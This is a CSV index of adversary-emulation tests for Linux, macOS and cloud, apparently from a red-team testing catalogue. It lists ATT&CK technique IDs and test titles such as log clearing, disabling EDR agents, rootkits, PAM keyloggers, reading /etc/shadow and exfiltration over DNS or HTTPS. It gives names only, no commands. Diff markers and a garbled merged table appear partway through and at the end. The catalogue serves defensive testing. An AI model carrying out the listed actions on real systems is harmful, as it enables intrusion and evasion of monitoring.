defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
defense-evasion,T1027.004,Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -136,19 +76,13 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1036.006,Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -158,10 +92,6 @@ defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef15
defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
@@ -171,7 +101,7 @@ impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Diectory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
@@ -182,7 +112,7 @@ discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f
discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
@@ -191,90 +121,39 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.003,Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Unix Shell,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Unix Shell,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048.002,Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
initial-access,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access privilege-escalation T1003.008 T1546.004 /etc/passwd and /etc/shadow .bash_profile and .bashrc 1 Access /etc/shadow (Local) Add command to .bash_profile 3723ab77-c546-403c-8fb4-bb577033b235 94500ae1-7e31-47e3-886b-c328da46872f bash sh
3 credential-access privilege-escalation T1003.008 T1546.004 /etc/passwd and /etc/shadow .bash_profile and .bashrc 2 Access /etc/passwd (Local) Add command to .bashrc 60e860b6-8ae6-49db-ad07-5e73edd88f5d 0a898315-4cfa-4007-bafe-33a4646d115f sh
credential-access T1003.008 /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
credential-access T1003.008 /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
credential-access T1552.007 Container API 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
credential-access T1552.007 Container API 2 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
credential-access T1110.004 Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
credential-access T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
credential-access T1056.001 Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
credential-access T1056.001 Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
credential-access T1056.001 Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
credential-access T1056.001 Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
credential-access T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
credential-access T1110.001 Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
credential-access T1110.001 Password Guessing 4 SUDO brute force Debian 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a sh
credential-access T1110.001 Password Guessing 5 SUDO brute force Redhat b72958a7-53e3-4809-9ee1-58f6ecd99ade sh
credential-access T1110.003 Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
credential-access T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
credential-access T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
